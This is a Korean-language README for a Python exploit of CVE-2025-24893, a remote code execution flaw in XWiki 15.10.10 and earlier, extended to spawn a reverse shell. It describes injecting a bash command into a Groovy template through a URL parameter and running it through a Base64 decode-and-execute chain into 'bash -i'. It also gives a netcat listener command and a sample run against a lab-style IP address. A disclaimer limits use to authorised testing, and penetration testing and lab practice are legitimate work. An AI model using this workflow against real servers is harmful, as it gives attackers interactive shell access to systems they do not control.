
XWiki용 CVE-2025-24893 RCE 익스플로이트 (리버스 셸 기능 포함)
면책 조항: 이 스크립트는 교육 목적 및 승인된 보안 테스트 전용입니다. 소유하지 않거나 명시적 테스트 허가가 없는 시스템에서 사용하지 마십시오. 오용은 불법적이고 위험할 수 있습니다.
이 Python 스크립트는 CVE-2025-24893을 익스플로잇합니다. 이는 15.10.10 이하의 XWiki 버전에 영향을 미치는 원격 코드 실행(RCE) 취약점입니다.
이 버전은 Al Baradi Joy의 원본 PoC를 확장하여 리버스 셸을 실행합니다. 원본 PoC는 여기에서 확인할 수 있습니다.
XWiki는 URL 매개변수를 통해 Groovy 코드를 실행합니다.
익스플로잇은 이 Groovy 템플릿에 bash -c 명령어를 주입합니다.
일반적인 리버스 셸은 여러 개의 따옴표(' 및 ")를 포함하여 Groovy 평가와 URL을 손상시킵니다.
이를 해결하기 위해 스크립트는 한 줄 셸 명령어를 Base64로 인코딩합니다.
페이로드는 URL로 전송된 후 다음 체인을 사용하여 실행됩니다:
{echo,<base64>} | {base64,-d} | {bash,-i}
이는 Base64 페이로드를 안전하게 디코딩하고 bash -i로 실행하여 대화형 리버스 셸을 제공합니다.
http://<target-host>//xwiki 경로 (스크립트가 자동으로 추가함)예시:
# 올바름
http://10.129.95.114:8080
http://example.com:8080
# 올바르지 않음
http://10.129.95.114:8080/ # 슬래시 있음
http://example.com/xwiki # /xwiki 포함
익스플로잇을 실행하기 전에 리버스 셸을 받기 위해 리스너를 시작해야 합니다.
Netcat 사용 예시:
nc -lvnp <lport>
<lport>는 스크립트에 인수로 제공하는 포트와 일치해야 합니다.python3 cve-2025-24893.py <target_base_url> <lhost> <lport>
예시:
python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444